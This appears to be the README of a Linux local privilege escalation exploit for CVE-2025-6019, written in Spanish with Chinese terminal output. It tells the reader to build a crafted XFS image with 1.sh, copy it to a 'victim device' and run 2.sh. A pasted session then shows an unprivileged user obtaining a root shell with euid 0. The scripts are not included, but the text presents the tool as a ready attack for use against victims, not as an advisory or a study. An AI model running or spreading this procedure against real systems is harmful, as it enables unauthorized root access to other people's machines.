
Exploit de escalada local de privilegios para CVE-2025-6019 que utiliza imágenes de sistema de archivos XFS manipuladas para obtener acceso root en sistemas Linux.
Primer paso: ejecute 1.sh en el dispositivo Linux para construir xfs.image
Segundo paso: transfiera xfs.image al dispositivo víctima y ejecute 2.sh; lo siguiente indica que se ha logrado
neko@aosc-neko205 [ tmp ] $ bash 2.sh
当前用户: neko
uid=1000(neko) gid=1001(neko) 组=1001(neko),11(audio),12(video),15(cdrom),974(ollama),997(wheel),999(plugdev),1002(gamemode)
('yes',)
Mapped file /home/neko/xfs.image as /dev/loop0.
成功找到 Root Shell: /tmp/blockdev.IK6D92/root-shell
正在提权...
root-shell-5.2# id
uid=1000(neko) gid=1001(neko) euid=0(root) 组=1001(neko),11(audio),12(video),15(cdrom),974(ollama),997(wheel),999(plugdev),1002(gamemode)
root-shell-5.2#